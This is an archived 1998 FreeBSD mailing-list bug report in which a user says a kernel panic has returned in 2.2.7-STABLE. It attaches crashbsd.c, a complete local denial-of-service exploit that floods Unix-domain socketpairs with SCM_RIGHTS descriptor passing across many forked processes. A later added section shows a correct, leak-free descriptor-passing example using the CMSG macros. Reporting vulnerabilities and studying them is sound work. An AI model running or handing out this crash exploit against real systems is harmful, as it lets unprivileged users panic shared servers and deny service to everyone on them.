Date: Tue, 11 Aug 1998 00:31:03 -0700 (PDT) From: Scott <scott@SchematiX.net> To: FreeBSD-stable@FreeBSD.ORG Subject: Huge Bug in FreeBSD not fixed? Message-ID: <Pine.BSF.4.02.9808110025020.216-200000@SchematiX.net>
[-- Attachment #1 --]
I ran across this bug a while back on rootshell, and then again by a user
on IRC who offered to take down my box. Soon after that, the bug was fixed
and things were fine. But just out of boredom, I decided to run the
exploit again. Sure enough, I had a kernel panic and that was it. All of
this from a normal user account. The bug has recurred recently and may
cause problems on my server if the users find out about the vulnerability.
I am running FreeBSD 2.2.7-STABLE (Last compiled on August 5th early in
the morning). The system is running on a PII233 with 64MB RAM. This bug
REALLY needs to be fixed ASAP.
I would like to know if other systems are vulnerable as well. I discussed
this matter on IRC and everyone said they had similar problems. This bug
needs to be addressed soon. I would HATE switching to linux because my
system keeps crashing.
---------------
Scott Swindells, SchematiX.NET
[-- Attachment #2 --]
/* crashbsd.c
**
** THIS PROGRAM CAUSES KERNEL PANIC ON SOME SYSTEMS
**
** Usage: crashme [--harder]
**
** --harder option causes this program to leave opened file descriptors hanging
** thus increasing the probability of the crash.
**
** How it works: up to 100 child processes are forked. Each child creates an
** AF_UNIX socketpair and forks again. The sender side opens /dev/null once and
** passes that descriptor 2048 times with SCM_RIGHTS, so every queued message
** carries another reference to the open file "in flight" in the socket buffer.
** The receiver side reads each message and, unless --harder was given, closes
** the descriptor it received; with --harder the received descriptors are left
** open.
**
** Note: the control message is laid out by hand rather than with the
** CMSG_SPACE/CMSG_LEN/CMSG_DATA macros, so it assumes the descriptor sits
** directly after struct cmsghdr with no alignment padding.
*/
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* strcmp() */
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/un.h>
#include <sys/uio.h>
#include <sys/socket.h>
#include <sys/wait.h>

int main(int argc, char **argv)
{
    int harder = 0, p, nproc, h, i, socketfds[2];
    char a[10];
    struct iovec iov1 = { a, 1 };
    struct cmsghdr *cm;
    struct msghdr msg;
    /* room for a cmsghdr followed by up to 24 descriptors */
    char bbuffer[sizeof(struct cmsghdr) + sizeof(int) * 24];

    if (argc >= 2 && !strcmp(argv[1], "--harder"))
        harder = 1;

    nproc = -1;
    for (i = 0; i < 100; i++) {
        if (!(p = fork())) {
            /* child: one socketpair, then split into sender and receiver */
            if (socketpair(AF_UNIX, SOCK_STREAM, 0, socketfds)) {
                perror("socketpair");
            } else {
                cm = (struct cmsghdr *)bbuffer;
                cm->cmsg_level = SOL_SOCKET;
                cm->cmsg_type = SCM_RIGHTS;
                cm->cmsg_len = sizeof(struct cmsghdr) + sizeof(int);
                msg.msg_name = (caddr_t)0;
                msg.msg_namelen = 0;
                msg.msg_flags = 0;
                msg.msg_iov = &iov1;
                msg.msg_iovlen = 1;
                msg.msg_control = (caddr_t)cm;
                msg.msg_controllen = cm->cmsg_len;
                if (fork()) {
                    /* sender: pass the same /dev/null descriptor 2048 times */
                    close(socketfds[0]);
                    *(int *)(bbuffer + sizeof(struct cmsghdr)) = open("/dev/null", O_RDONLY);
                    for (i = 0; i < 2048; i++) {
                        fprintf(stderr, "%d> ", i + 1);
                        /* spin until the one-byte payload (and its descriptor) is accepted */
                        while (sendmsg(socketfds[1], &msg, 0) != 1) {
                            if (errno != EAGAIN) {
                                perror("\nsendmsg");
                            }
                        }
                    }
                } else {
                    /* receiver: collect the descriptors, closing each one
                     * only when --harder was not given */
                    close(socketfds[1]);
                    for (i = 0; i < 2048; i++) {
                        *(int *)(bbuffer + sizeof(struct cmsghdr)) = -1;
                        fprintf(stderr, ">%d ", i + 1);
                        cm = (struct cmsghdr *)bbuffer;
                        cm->cmsg_level = SOL_SOCKET;
                        cm->cmsg_type = SCM_RIGHTS;
                        cm->cmsg_len = sizeof(struct cmsghdr) + sizeof(int) * 24;
                        msg.msg_name = (caddr_t)0;
                        msg.msg_namelen = 0;
                        iov1.iov_len = 10;
                        msg.msg_iov = &iov1;
                        msg.msg_iovlen = 1;
                        msg.msg_control = (caddr_t)cm;
                        msg.msg_controllen = cm->cmsg_len;
                        if (recvmsg(socketfds[0], &msg, 0) != 1) {
                            perror("\nrecvmsg");
                        } else {
                            fprintf(stderr, "(%d) ", *(int *)(bbuffer + sizeof(struct cmsghdr)));
                            if (!harder) {
                                close(*(int *)(bbuffer + sizeof(struct cmsghdr)));
                            }
                        }
                    }
                    exit(0);
                }
                wait(&h);   /* sender waits for the receiver to finish */
            }
            exit(0);
        } else {
            if (p < 0) {
                /* fork failed: remember how many children were started and stop */
                nproc = i;
                i = 100;
            }
        }
    }
    if (nproc < 0)
        nproc = 100;
    for (i = 0; i < nproc; i++)
        wait(&h);
    fprintf(stderr, "\n%d processes finished\n", nproc);
    return 0;
}
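The hand-built control message in crashbsd.c is the part most likely to break on a system where struct cmsghdr is followed by alignment padding. As an added example that is not part of the original post and not FreeBSD code, here is the same SCM_RIGHTS round trip written against the CMSG_* macros, with the receiver checking MSG_CTRUNC and closing every descriptor it does not keep, which is the discipline a real receiver needs (the exploit's --harder mode is exactly a receiver that skips that close). It assumes only POSIX sockets and the presence of /dev/null; the names send_fd, recv_fd and pass_fd_roundtrip are mine.

```c
/* Added example: a correct SCM_RIGHTS round trip over a socketpair using the
 * CMSG_* macros. Not part of the original post. Assumes POSIX sockets and that
 * /dev/null exists. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/un.h>

/* Control buffer sized and aligned for exactly one descriptor. */
union fd_ctl {
    struct cmsghdr hdr;                  /* forces cmsghdr alignment */
    char buf[CMSG_SPACE(sizeof(int))];
};

/* Send fd_to_send over sock with a one-byte payload. 0 on success, -1 on error. */
int send_fd(int sock, int fd_to_send)
{
    char payload = 'F';
    struct iovec iov = { &payload, 1 };
    union fd_ctl ctl;
    struct msghdr msg;
    struct cmsghdr *cm;

    memset(&ctl, 0, sizeof ctl);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctl.buf;
    msg.msg_controllen = sizeof ctl.buf;

    cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd_to_send, sizeof(int));   /* no hand-computed offsets */

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor from sock. Returns the new fd, or -1.
 * Keeps the first descriptor only; closes any extra ones, and closes all of
 * them if the kernel reports the control data was truncated (MSG_CTRUNC),
 * so a misbehaving peer cannot leave descriptors dangling in this process. */
int recv_fd(int sock)
{
    char payload;
    struct iovec iov = { &payload, 1 };
    union fd_ctl ctl;
    struct msghdr msg;
    struct cmsghdr *cm;
    int got = -1, truncated;

    memset(&ctl, 0, sizeof ctl);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctl.buf;
    msg.msg_controllen = sizeof ctl.buf;

    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    truncated = (msg.msg_flags & MSG_CTRUNC) != 0;

    for (cm = CMSG_FIRSTHDR(&msg); cm != NULL; cm = CMSG_NXTHDR(&msg, cm)) {
        size_t n, i;
        if (cm->cmsg_level != SOL_SOCKET || cm->cmsg_type != SCM_RIGHTS)
            continue;
        n = (cm->cmsg_len - CMSG_LEN(0)) / sizeof(int);
        for (i = 0; i < n; i++) {
            int fd;
            memcpy(&fd, CMSG_DATA(cm) + i * sizeof(int), sizeof(int));
            if (got < 0 && !truncated)
                got = fd;        /* keep the first one */
            else
                close(fd);       /* never leak the rest */
        }
    }
    return got;
}

/* Pass a /dev/null descriptor across a socketpair and confirm the received
 * descriptor names the same file (same st_dev/st_ino). Returns 0 on success,
 * or 1..5 identifying the step that failed. */
int pass_fd_roundtrip(void)
{
    int sv[2], orig = -1, received = -1, rc = 0;
    struct stat a, b;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return 1;
    if ((orig = open("/dev/null", O_RDONLY)) < 0)
        rc = 2;
    else if (send_fd(sv[1], orig) != 0)
        rc = 3;
    else if ((received = recv_fd(sv[0])) < 0)
        rc = 4;
    else if (fstat(orig, &a) != 0 || fstat(received, &b) != 0 ||
             a.st_dev != b.st_dev || a.st_ino != b.st_ino)
        rc = 5;

    if (received >= 0) close(received);
    if (orig >= 0) close(orig);
    close(sv[0]);
    close(sv[1]);
    return rc;
}

int main(void)
{
    int rc = pass_fd_roundtrip();
    printf("fd round trip %s (code %d)\n", rc == 0 ? "ok" : "failed", rc);
    return rc;
}
```

The union is what makes the buffer portable: CMSG_SPACE already includes any padding the platform inserts after the header, and CMSG_DATA locates the payload, so the same source works whether or not the descriptor sits directly behind struct cmsghdr.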
Archive URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.02.9808110025020.216-200000>
